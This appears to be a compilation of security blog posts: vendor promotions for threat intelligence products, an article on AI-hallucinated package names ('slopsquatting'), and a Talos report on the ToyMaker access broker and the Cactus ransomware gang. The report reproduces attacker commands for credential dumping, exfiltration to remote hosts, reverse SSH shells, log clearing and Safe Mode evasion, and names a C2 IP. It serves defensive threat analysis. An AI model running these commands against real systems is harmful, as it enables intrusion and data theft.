ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025  

We are honored to announce that ANY.RUN became a gold winner at the annual Globee Business Awards 2025. The award aims to recognize and celebrate excellence in various industries worldwide, including cybersecurity. 

Our solution, ANY.RUN’s TI Lookup, was named best in the Cyber Threat Intelligence category. We believe that threat intelligence is an essential aspect of ensuring the cybersecurity of organizations, and recognition in this sphere is important to us. 

We’d like to thank you—our readers, partners, users of our products, and all fellow cybersecurity enthusiasts and professionals! The victory itself is not as important as the fact that it stands for continuous support from the community and acknowledgement of our high-quality products benefiting thousands of businesses

What makes TI Lookup special 

Threat Intelligence Lookup
Homepage of ANY.RUN’s Threat Intelligence Lookup 

TI Lookup is a search engine that gives users the opportunity to navigate ANY.RUN’s database of fresh and unique information on cyber attacks. It is continuously enriched with extensive data on the latest threats analyzed by 500,000 security professionals and 15,000 companies in ANY.RUN’s Interactive Sandbox.  

As a result, it contains a wealth of indicators and events logged during analyses, including IOCs, IOAs, and IOBs. 

Threat Intelligence Lookup helps you: 

  • Pin existing IOCs to specific threats and discover additional indicators to update your detection capabilities. 
  • Simplify and accelerate threat investigation thanks to the quick response time and access to up-to-date information. 
  • Browse extensive and regularly updated database of malware samples to get in-depth context of threats. 
  • Increase the efficacy of incident response and triage by working on the tasks as a team. 
  • Monitor evolving threats by subscribing to requests relevant to your company using Search Updates. 

Enrich alerts and expand threat context with TI Lookup
Get 50 trial requests to collect your first intel 



Try now for your SOC


How Threat Intelligence Lookup Benefits SOC Teams

  • Accelerate triage and threat identification: Uncover attacks behind alerts with quick indicator search to block them before they escalate.
  • Improve incident response: Collect attack IOCs, IOAs, IOBs, TTPs, and observe its full execution inside the sandbox for more accurate response.
  • Strengthen proactive security: Enrich your defense with fresh indicators from the latest samples to prevent attacks, including with auto-updates.
  • Simplify threat hunting: Run proactive searches on indicators found in your network to pin them to actual threats.
  • Enhance forensic analysis: investigate system events and indicators with the help of TI Lookup to discover missing attack details.

Recognition 

It means a lot to us that the expert committee once again expressed their appreciation of our efforts. Previously our flagship product ANY.RUN’s Interactive Sandbox was announced a silver winner in the Outstanding Threat Detection and Response category at Globee Awards 2025. 

About ANY.RUN  

ANY.RUN creates products for malware analysts and SOC teams, such as ANY.RUN’s Interactive Sandbox, TI Lookup and TI Feeds. They help accelerate the work of security specialists of all tiers and benefit businesses by providing helpful insights that allow them to minimize harmful consequences of cyber attacks or avoid them altogether. 

Integrate ANY.RUN’s award-winning services in your organization to strengthen your security →

The post ANY.RUN Becomes a Gold Winner in Threat Intelligence at Globee Awards 2025   appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

What is slopsquatting, and how to protect your organization

AI-generated code is already widespread — by some estimates around 40% of new code this past year was written by AI. Microsoft CTO Kevin Scott predicts that in five years this figure will hit 95%. How to properly maintain and protect such code is a burning issue.

Experts still rate the security of AI code as low, as it’s teeming with all the classic coding flaws: vulnerabilities (SQL injections, embedded tokens and secrets, insecure deserialization, XSS), logical defects, outdated APIs, insecure encryption and hashing algorithms, no handling of errors and incorrect user input, and much more. But using an AI assistant in software development adds another unexpected problem: hallucinations. A new study examines in detail how large language models (LLMs) create hallucinations that pop up in AI code. It turns out that some third-party libraries called by AI code simply don’t exist.

Fictitious dependencies in open-source and commercial LLMs

To study the phenomenon of phantom libraries, the researchers prompted 16 popular LLMs to generate 576,000 Python and JavaScript code samples. The models showed varying degrees of imagination: GPT4 and GPT4 Turbo hallucinated the least (fabricated libraries were seen in less than 5% of the code samples); next came DeepSeek models (more than 15%); while CodeLlama 7B was the most fantasy-prone (more than 25%). What’s more, even the parameters used in LLMs to control randomness (temperature, top-p, top-k) are unable to reduce the hallucination rate to insignificant values.

Python code contained fewer fictitious dependencies (16%) than JavaScript (21%). Age is also a contributing factor. Generating code using packages, technologies and algorithms that started trending only this past year results in 10% more non-existent packages.

But the most dangerous aspect of phantom packages is that their names aren’t random, and neural networks reference the same libraries over and over again. That was demonstrated by stage two of the experiment, in which the researchers selected 500 prompts that had provoked hallucinations, and re-ran each of them 10 times. This revealed that 43% of hallucinated packages crop up during each code generation run.

Also of interest is the naming of hallucinated packages: 13% were typical “typos” that differed from the real package name by only one character; 9% of package names were borrowed from another development language (Python code, npm packages); and a further 38% were logically named but differed more significantly from the real package names.

Meet slopsquatting

All of the can provoke a new generation of attacks on open-source repositories, which has already been dubbed “slopsquatting” by analogy with typosquatting. In this case, squatting is made possible not by names with typos, but by names from AI slop (low-quality output). Because AI-generated code repeats package names, attackers can run popular models, find recurring hallucinated package names in the generated code, and publish real — and malicious — libraries with these same names. If someone mindlessly installs all packages referenced in the AI-generated code, or the AI assistant installs the packages by itself, a malicious dependency gets injected into the compiled application, exposing the supply chain to a full-blown attack (ATT&CK T1195.001). This risk is set to rise significantly with the advance of vibe coding — where the programmer writes code by giving instructions to AI with barely a glance at the actual code produced.

Given that all major open-source repositories have been hit by dozens of malicious packages this past year (1, 2), and close to 20,000 malicious libraries have been discovered in the same time period, we can be sure that someone out there will try to conveyorize this new type of attack. This scenario is especially dangerous for amateur programmers, as well as for corporate IT departments that solve some automation tasks internally.

How to stop slopsquatting and use AI safely

Guidelines on the safe implementation of AI in development already exist (for example, OWASP, NIST and our own), but these tend to describe a very broad range of measures, many of which are long and complicated to implement. Therefore, we’ve compiled a small subset of easy-to-implement measures to address the specific problem of hallucinated packets:

  • Make source-code scanning and static security testing part of the development pipeline. All code, including AI-generated, must meet clear criteria are: no embedded tokens or other secrets; use of correct versions of libraries and other dependencies, and so forth. These tasks are well integrated into the CI/CD cycle — for example, with the help of our Kaspersky Container Security.
  • Introduce additional AI validation cycles where the LLM checks its own code for errors, to reduce the number of hallucinations. In addition, the model can be prompted to analyze the popularity and usability of each package referenced in a project. Using a prebuilt database of popular libraries to fine-tune the model and allow retrieval-augmented generation (RAG) also reduces the number of errors. By combining all these methods, the authors of the study were able to cut the number of hallucinated packages to 2.4% for DeepSeek and 9.3% for CodeLlama. Unfortunately, both figures are too far off zero for these measures to suffice.
  • Ban the use of AI assistants in coding critical and trusted components. For non-critical tasks where AI-assisted coding is allowed, assign a component developer to build a code review process. For the review, there needs to be a checklist tailored to AI code.
  • Draw up a fixed list of trusted dependencies. AI assistants and their flesh-and-blood users must have limited scope to add libraries and dependencies to the code — ideally, only libraries from the organization’s internal repository, tested and approved in advance, should be available.
  • Train developers. They must be well versed in AI security in general, as well as in the context of AI use in code development.

Kaspersky official blog – ​Read More

How Threat Intelligence Feeds Help During Incident Response

When data meets automation, two pillars of modern tech converge to create something smarter: Threat Intelligence Feeds. Real-time insights, machine-speed decisions, and a global perspective — all working together to outsmart threats before they become incidents. 

ANY.RUN’s TI Feeds are structured, continuously updated streams of fresh threat data. They contain network-based IOCs — IP addresses, domain names, and URLs — and are enriched by additional context-providing indicators like file hashes and port indicators. 

The Feeds enhance threat detection capabilities of security systems, enable SOC teams to quickly mitigate attacks, including emerging malware and persistent threats. 

Source, Structure, Benefits of ANY.RUN’s TI Feeds 

You can download a free sample of Threat Intelligence Feeds in STIX or MISP format

Threat Intelligence Feeds provided by ANY.RUN are sourced from public analysis sessions in our cloud-based sandbox, where users including the SOC teams of 15,000 organizations from a variety of industries detonate and dissect real-world malware samples.  

The indicators are pre-processed using proprietary algorithms and whitelists to minimize false positives, ensuring high accuracy and relevance. Each indicator of compromise is enriched with contextual metadata providing deeper insights into the threat.

This means that an IP, URL, or domain in TI Feeds are enriched with:  

  • External references: Links to relevant sandbox sessions. 
  • Label: Name of the malware family or campaign. 
  • Detection timestamps: last/first seen dates provide a timeline to understand if a threat is ongoing or historical. 
  • Related objects: IDs of files and network indicators related to the IOC. 
  • Score: Value representing the severity level of the IOC. 

ANY.RUN’s TI Feeds come in STIX or MISP format with indicators of your choice. Set up a test sample to start leveraging actionable IOCs data in your security operations. ANY.RUN also runs a dedicated MISP instance that you can synchronize your server with or connect to your security solutions. To get started, contact our team via this page

By delivering insights into threats and their indicators of compromise (OCs), TI Feeds support organizations across multiple phases of incident response: Incident Triage, Threat Hunting, and Post-Incident Analysis. 

Boost detection and expand threat coverage in your SOC
with TI Feeds from ANY.RUN 



Request 14-day trial


Incident Triage 

Incident Triage involves assessing and prioritizing security alerts to determine their severity and potential impact. This must be done quickly and yet precisely, saving analysts from wasting time on false positives and highlighting critical true positives.  

TI Feeds streamline this process by providing contextual data to validate and enrich alerts, enabling faster and more accurate decision-making.  

TI Feeds for Triage: 

  • Correlation with Known Threats: Feeds supply IOCs (e.g., malicious IPs, domains, file hashes) that can be cross-referenced with incoming alerts to confirm whether an incident is legitimate or a false positive. 
  • Prioritization: Feeds provide threat severity scores and context (e.g., association with a known ransomware group) to help security teams sort out incidents that pose the greatest risk. 
  • Automation: Integration with Security Information and Event Management (SIEM) systems or Security Orchestration, Automation, and Response (SOAR) platforms allows TI Feeds to automatically enrich alerts with relevant threat data, reducing manual effort. 

Example 

A financial institution receives an alert from its intrusion detection system (IDS) about a suspicious outbound connection to an unfamiliar IP address. A TI Feed identifies the IP as part of a command-and-control (C2) server linked to Lynx ransomware. Armed with this information, the team prioritizes the incident as high-severity, immediately isolates the affected endpoint, and escalates it for further investigation, avoiding a potential data breach. 

Business Impact

background
  • Reduces Mean Time to Detect (MTTD) by quickly validating alerts. 
  • Minimizes resource waste on false positives, allowing focus on critical incidents. 
  • Enhances compliance by ensuring timely response to high-risk threats. 

ANY.RUN’s TI Feeds are updated every few hours, pulling fresh IOCs from over 16,000 daily public tasks submitted by its community. This near real-time delivery ensures organizations can respond to emerging threats almost immediately after they are detected in the wild. 

Threat Hunting

  • Enriching Network Data: Feeds supply IOCs that can be correlated with network logs, endpoint data, or user activity to uncover anomalies. 
  • Guiding Hypothesis Development: TI Feeds enriched with contextual data provide the basis for further malware, attack, or actor investigation. Enabled to proceed from IOCs to TTPs, hunters can craft targeted hypotheses about potential threats. 
  • Proactive Defense: By highlighting emerging threats (e.g., new exploit kits or phishing campaigns), TI Feeds allow hunters to search for related activity before an attack fully unfolds. 

Example 

A retail company’s threat-hunting team learns from their TI Feed about a new phishing campaign targeting e-commerce platforms with a specific malicious domain and a unique file hash for a ransomware payload. The team uses this intelligence to search their network logs for any connections to the domain or instances of the file hash.  

They discover a single endpoint that attempted to access the domain but was blocked by the firewall. Further investigation reveals a phishing email that evaded initial detection. The team neutralizes the threat by quarantining the endpoint and updating email filters, preventing a potential ransomware outbreak. 

Business Impact 

background
  • Prevents incidents by identifying threats before they cause harm. 
  • Strengthens proactive security posture, reducing the likelihood of successful attacks. 
  • Protects brand reputation by avoiding customer data exposure. 

Post-Incident Analysis 

Post-Incident Analysis focuses on understanding the root cause of an incident, assessing its impact, and improving future defenses. TI Feeds provide critical context to reconstruct the attack, identify gaps in security, and build remediation strategies.  

ANY.RUN’s TI Feeds draw from a vast dataset generated by a diverse community of 500,000 analysts and teams of 15,000 enterprises. This scale ensures broad coverage of threats, including zero-day exploits and emerging malware, tailored to various industries. It helps teams map incidents to global trends. 

TI Feeds in Post-Incident Analysis 

  • Attack Reconstruction: Feeds supply detailed intelligence on threat actors and associated IOCs, helping teams trace the attack’s origin and progression. 
  • Gap Identification: By comparing the incident to known threat patterns, TI Feeds reveal weaknesses in defenses (e.g., unpatched vulnerabilities or misconfigured systems). 
  • Retrospective Analysis: Newly published threat intel can be used to re-analyze old data. This helps identify if earlier, undetected activity was related to a known campaign. 

Example 

After a manufacturing company suffers a data breach involving stolen intellectual property, the incident response team uses their TI Feed to analyze the attack. The feed reveals that the breach was caused by a spear-phishing campaign linked to a nation-state actor known for targeting industrial sectors. 

Since ANY.RUN’s Feeds provide links to sandbox analyses of the phishing samples, the team can extract the attacker’s TTPs, including the use of a specific exploit in an unpatched software version and a custom PowerShell script for data exfiltration.  

The team can now patch the vulnerability, deploy new endpoint detection rules to flag similar scripts, and conduct employee training on recognizing spear-phishing emails. Additionally, the feed’s geopolitical context prompts the company to enhance monitoring of critical R&D systems. 

Business Impact 

background
  • Reduces Mean Time to Recover (MTTR) by guiding effective remediation
  • Strengthens long-term resilience by addressing root causes and vulnerabilities
  • Supports compliance by documenting lessons learned and mitigation steps for audits

Ways TI Feeds Support Organizational Efficiency 

ANY.RUN’s TI Feeds are designed for easy integration with SIEM, SOAR, firewalls, and other security platforms, supporting formats like STIX and MISP. This ensures automated ingestion of IOCs, streamlining workflows and enhancing existing tools’ effectiveness. 

By integrating real-time, high-quality threat data with automation, TI Feeds enhance organizational resilience, reduce risks, and support informed decision-making. Their most important benefits that align with business objectives and KPIs are:  

1. Early Detection Capabilities 

TI Feeds enable identification of potential risks before they escalate into costly incidents. By identifying malware or phishing campaigns at their inception, TI Feeds help businesses avoid disruptions, protect customer trust, and safeguard revenue streams. 


Learn more about ANY.RUN's TI Feeds

Learn more about ANY.RUN’s TI Feeds

See what types of indicators are available in our feeds with examples



2. Faster Response Times 

TI Feeds significantly shorten the time to identify and mitigate threats by correlating threat data with ongoing incidents. Faster response times contribute to KPIs like Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), which are critical for minimizing the impact of security breaches.  

Addressing breaches promptly reduces financial losses, protects brand reputation, and ensures compliance with regulatory requirements (e.g., GDPR, CCPA).

3. Informed Decision-Making  

TI Feeds give organizations actionable intelligence, enabling data-driven decisions that align cybersecurity strategies with business goals. A clear picture of the threat landscape helps business leaders prioritize investments in security controls, employee training, or third-party partnerships, driving long-term resilience and competitive advantage. 

4. Proactive Defense 

TI Feeds shift organizations from reactive to proactive cybersecurity, anticipating threats and preventing incidents before they occur. It improves KPIs like the percentage of prevented incidents, reduction in remediation costs, and increased system uptime 

Conclusion 

ANY.RUN’s Threat Intelligence Feeds deliver significant value by combining high-quality, low-noise data, near real-time updates, a massive community-driven dataset, seamless integration, and unique sandbox-driven insights.  

These benefits directly enhance Incident Triage by speeding up alert validation, Threat Hunting by enabling proactive threat discovery, and Post-Incident Analysis by providing detailed context for remediation. 

By integrating TI Feeds into incident response workflows, organizations can minimize damage, enhance security posture, and align cybersecurity efforts with business objectives.  

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request trial of ANY.RUN’s services to test them in your organization → 

The post How Threat Intelligence Feeds Help During Incident Response appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

  • In 2023, Cisco Talos discovered an extensive compromise in a critical infrastructure enterprise consisting of a combination of threat actors.
  • From initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of various dual-use remote administration, SSH and file transfer tools. 
  • The Initial Access Broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence is a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.
  • A compromise by LAGTOY may result in access handover to a secondary threat actor. Specifically, we’ve observed ToyMaker handover access to Cactus, a double extortion gang who employed their own tactics, techniques and procedures (TTPs) to carry out malicious actions across the victim’s network.

Turnaround time from ToyMaker to Cactus

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

Intrusion analysis across various endpoints enabled Talos to build a timeline of events from initial compromise to access handover to subsequent secondary malicious activity. The following is a high-level timeline of events:

Day of activity

Type of malicious activity

Threat actor

Initial compromise

User enumeration

Preliminary recon

Fake user creation

Credential extraction via Magnet RAM Capture

ToyMaker

+2 day(s)

Deploy LAGTOY implant

ToyMaker

Lull in activity for 3 weeks

+3 weeks aka Cactus day 0

Endpoint enumeration

Cactus

Cactus day 2

Server and file enumeration

Indicator removal

Cactus

Cactus day 2 and 3

Proliferation through enterprise

Cactus

Cactus day 4

Archiving sensitive data for exfiltration – extortion

Cactus

Cactus day 8

Remote management tools deployment: eHorus, RMS, AnyDesk

OpenSSH connections

Cactus

Cactus day 12

Malicious account creations for ransomware deployment

Cactus

Cactus day 12

Delete volume shadow copies

Boot recovery modifications

Cactus

ToyMaker’s TTPs and tools

After the initial compromise, ToyMaker performed preliminary reconnaissance, credential extraction and backdoor deployment within the span of a week, after which they took no further activity. Talos did not observe any victim-specific data exfiltration nor did we observe attempts to discover and pivot to other valuable endpoints. After a lull in activity of approximately three weeks, we observed the Cactus ransomware group make its way into the victim enterprise using credentials stolen by ToyMaker. Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions or goals.

Talos therefore assesses with medium confidence that ToyMaker is a financially-motivated Initial Access Broker (IAB) who acquires access to high value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment.

The disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately. However, it is imperative to establish relationships between the two. In fact, similar connections need to be incorporated into paradigms used for threat modeling any suspected IABs. In subsequent blogs, Talos will propose a new methodology for modeling and tracking compartmentalized and yet somewhat connected threats.

ToyMaker has been known to use a custom malware family — a backdoor Talos tracks as LAGTOY. ToyMaker usually infiltrates an organization’s environment by successfully exploiting a known vulnerability in an unpatched internet-facing server. Successful compromise almost immediately results in rapid reconnaissance of the system:

COMMAND

INTENT

whoami

net user

net localgroup

net group

net user Administrator

nltest /domain_trusts

net group Enterprise Admins

System Information Discovery [T1082]

ipconfig /all

Gather Victim Network Information [T1590]

Reconnaissance is followed by the creation of a fake user account named ‘support’:

COMMAND

INTENT

net user support Sup0rtadmin /add

net localgroup administrators support /add

Create Account [T1136]

Following this, the actor starts an SSH listener on the endpoint using the Windows OpenSSH package (sshd.exe). The endpoint then receives a connection from another infected host on the network that creates a binary named ‘sftp-server.exe’ which is the SFTP server module of OpenSSH. sftp-server.exe then connects to a remote host to download the Magnet RAM Capture executable:

COMMAND

INTENT

MRCv120.exe /accepteula /silent /go 

extract credentials [T1003]

Magnet RAM Capture is a freely available forensics tool used to obtain a memory dump of the host, from which credentials can be harvested. This tactic likely explains the high number of compromised systems that Talos identified during this campaign. 

The memory dump is then archived using the 7za.exe archive creation command [T1560]:

7za.exe a -p -mmt2 -mhe 1.7z 1.r

Subsequently the archive is exfiltrated from the endpoint using PuTTY’s SCP utility (pscp) [T1048]:

pscp.exe-P 53 1.7z root@<Remote_IP>:/root

Once the attackers have obtained the memory dump, they use the sftp-server.exe connection again to download and execute a custom made reverse shell implant we’re calling “LAGTOY”.

LAGTOY is persisted on the system by creating a service for it [T1543]:

sc create WmiPrvSV start= auto error= ignore binPath= C:Program FilesCommon FilesServicesWmiPrvSV.exe

The implant reaches out to the C2 server configured in it to receive commands to execute on the endpoint such as:

COMMAND

INTENT

tasklist

System Information Discovery [T1082]

quser

System Information Discovery [T1082]

ipconfig /all

System Information Discovery [T1082]

LAGTOY – ToyMaker’s staple backdoor

LAGTOY is a simple yet effective implant. The backdoor is called HOLERUN by Mandiant. It is meant to periodically reach out to the hard-coded C2 server and accept commands to execute on the infected endpoint. It is installed on the system as part of a service and contains rudimentary anti-debugging checks before initiating connections to the C2.

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs
LAGTOY execution logic.

As an anti-debug technique, the malware registers a custom unhandled exception filter using the kernel32!SetUnhandledExceptionFilter(). If the malware is running under a debugger, the custom filter won’t be called and the exception will be passed to the debugger. Therefore, if the unhandled exception filter is registered and the control is passed to it, then the process is not running with a debugger.

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

LAGTOY is intended to run on the infected system as a service with the name ‘WmiPrvSV’. 

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

Both the C2 IP address and the protocol port are hardcoded into LAGTOY.  The communication is done over port 443 with a raw socket — not using TLS as one would expect on this TCP port.

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs
Command and control communication.

The C2 will send specific administration codes to LAGTOY:

  • ‘#pt’ : Stop service.
  • ‘#pd’: Break from the current execution chain and check if the service has been stopped. If stopped then Sleep for a specific time period and re-initiate connection to the C2.
  • ‘#ps’: Simply create the process/command specific.
  • If the code doesn’t begin with ‘#’ then simply execute the provided command or process name on the endpoint.
Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs
Command recognition logic of LAGTOY.

Compared with the sample discovered in 2022 by Mandiant, this sample added the ‘#ps’ handler for creating process for command. 

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs
Sample in 2022 does not have the ‘#ps’ parameter.

Time-based execution 

LAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific time period. Talos assesses with high confidence that this logic is a novel custom built unique to the LAGTOY family of implants.

LAGTOY is able to process three commands from the C2 with a Sleep interval of 11000 milliseconds between them. During its beaconing cycle it will record the last successful time of C2 communications and successful command execution. If the commands issued by the C2 have been failing for at least 30 minutes then the implant will send a message to the C2 informing it of the failure to execute commands.

LAGTOY has a watchdog routine embedded. If it has been running for a cumulative time of more than 60 minutes, it will stop executing commands and then check if the service has been stopped. If the service is still active then the implant will reinitiate connections to the C2.

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs
Overall timing and C2 communications logic of LAGTOY.

ToyMaker gives way to ransomware cartels

Almost a month after ToyMaker established access to the victim enterprise, the actor passed on the access to a secondary threat actor, a Cactus ransomware affiliate, who primarily conducts ransomware and double extortion operations.

The Cactus gang conducted their own reconnaissance and persistence, deploying their own set of malware instead of using LAGTOY as a vehicle into the enterprise. Furthermore, they initially accessed the compromised endpoint using compromised user credentials obtained earlier by ToyMaker using the Magnet RAM Capture tool.

Initial recon and network scans

Cactus immediately began conducting network scans to identify systems of interest and proliferation. To spread across the network, they first ran a WSMAN discovery script to enumerate all endpoints configured to handle PowerShell remoting.

COMMAND

INTENT

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -File .fs.ps1 result.csv

Remote System Discovery [T1018]

C:PerfLogsAdmin7z.exe a -p<password> pss.7z .result.csv

C:PerfLogsAdmincurl.exe -k -T .pss.7z hxxps[:]//<remote_ip>:8443

C:PerfLogsAdmin7z.exe a -p<pwd> .CP-SERVER3.7z .CP-SERVER3.txt

C:PerfLogsAdmin7z.exe a -p<pwd> .FILEN01.7z .FILEN01.txt

C:PerfLogsAdmincurl[.]exe -k -T .CP-SERVER3.7z hxxps[://]<remote_ip>:8443

C:PerfLogsAdmincurl[.]exe -p -k -T .FILEN01.7z hxxps[://]<remote_ip>:8443

C:PerfLogsAdmin7z[.]exe a -p<pwd> .FILE-SERVER.7z .FILE-SERVER[.]txt

C:PerfLogsAdmincurl[.]exe -k -T .FILE-SERVER.7z hxxps[://]<remote_ip>:8443

Results are then compressed and sent to a remote server.

The same is done for other information.

Data exfiltration [T1048]

Once the attackers had obtained the information they would clean up traces of their access:

COMMAND

INTENT

C:Windowssystem32reg.exe delete HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU /f

Indicator Removal: Clear Command History [T1070]

C:Windowssystem32reg.exe delete HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault /va /f

C:Windowssystem32reg.exe delete HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers /f

C:Windowssystem32reg.exe add HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers

C:Windowssystem32attrib.exe %userprofile%documentsDefault.rdp -s -h

Indicator Removal: Clear Network Connection History and Configurations [T1070]

net user support /delete

Indicator Removal: Clear Persistence[T1070]

Data Exfiltration

The harvested credentials provided ToyMaker access to a multitude of systems, on which the threat actor performed reconnaissance for valuable information. These files were either archived and then exfiltrated using multiple dual-use tools such as 7zip and curl or extracted directly using file transfer utilities such as WinSCP [T1560, T1048]:

C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>

C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>

On other endpoints the attackers discovered and archived what is believed to be the victim’s customer data for exfiltration as well [T1560, T1048]:

C:Windowssystem32cmd.exe /c <path>7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>001.7z <path>Private FolderCustomers<path> -p<password>

The use of remote administration tools

Cactus used a variety of remote admin tools on different endpoints to maintain long-term access. The tools included:

  • eHorus Agent: Remote control software also known as Pandora RC
  • AnyDesk: Remote Desktop application
  • Remote Utilities for Windows Admin (RMS Remote Admin): A Russian made remote management tool/platform
  • OpenSSH: SSH package included and available for installation with the Windows OS

The remote administration utilities were downloaded from remote, attacker controlled locations via Powershell and Impacket:

COMMANDS from Impacket

INTENT

cmd.exe /Q /c powershell iwr -Uri http://<remote_IP>:7423/file.msi -OutFile C:Programdataf.msi 1> \127.0.0.1ADMIN$__<random> 2>&1

Stage Capabilities: Upload Malware [T1608]

cmd.exe /Q /c msiexec.exe /i C:Programdataf.msi /q EHUSER=<username> STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1> \127.0.0.1ADMIN$__<random> 2>&1

System Binary Proxy Execution: Msiexec [T1218]

In another instance, the attackers created reverse shells using OpenSSH, where a scheduled task was created to connect to the C2 server on an hourly basis to accept and execute commands:

COMMAND

INTENT

SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:Windowstempsys_log.bat > c:Windowstemplog.txt

Scheduled Task/Job [T1053]

SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:ProgramDatasshssh.exe -o “StrictHostKeyChecking no” root@<remote_ip> -p 443 -R 25369 -NCqf -i “C:Windowstempsyslog.txt” & timeout /t 15)

Scheduled Task/Job [T1053]

Remote services:SSH [T1021]

Cactus ransomware group takes its operational security seriously. They remove access to the file that contains the SSH private key used to exfiltrate information. This prevents the victim from reading the key under normal circumstances. 

COMMAND

INTENT

icacls C:WindowsTempsyslog.txt

icacls.exe C:Windowstempsyslog.txt /c /t /inheritance:d

icacls.exe C:WindowsTempsyslog.txt /c /t /remove BUILTINAdministrators

icacls.exe C:WindowsTempsyslog.txt /c /t /remove <userid>

icacls.exe C:Windowstempsyslog.txt /inheritance:r /grant SYSTEM:F

File and Directory Permissions Modification: Windows File and Directory Permissions Modification [T1222]

syslog.txt is the Private Key used by the threat actor for initiating SSH connection back to actor controlled infrastructure.

New user accounts

On some endpoints, the malicious operators created new unauthorized user accounts, likely to facilitate deployment of ransomware:

net user whiteninja <password> /add

reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /v LegalNoticeText /t REG_SZ /d  /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v DefaultUserName /t REG_SZ /d whiteninja /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v AutoLogonCount /t REG_DWORD /d 1 /f

Abusing Safe Mode for defense evasion

During our investigation, Talos found that the threat actor executed commands to reboot compromised hosts into Safe Mode with the following commands:

bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0

Booting a system into Safe Mode could be motivated by the intention to disable security products due to the fact that the system loads a minimal set of drivers and services. Some security products might be inactive or limited under Safe Mode, and the threat actor could leverage this to modify registry keys or settings to disable the security products completely [T1562.001].

Metasploit injected binaries

Cactus also extensively uses Metasploit shellcode-injected copies of the Windows-based binaries Putty and ApacheBench, which is a benchmarking tool for Apache HTTP servers to execute code on the compromised systems. These will contact the same remote server used to host the portable eHorus agent, 51[.]81[.]42[.]234, over Ports 53, 443, 8343 and 9232. Cactus additionally employed ELF binaries generated by Metasploit communicating with the same remote C2 51[.]81[.]42[.]234.

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

Metasploit shellcode communicating with the remote server.

Coverage 

Introducing ToyMaker, an Initial Access Broker working in cahoots with double extortion gangs

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

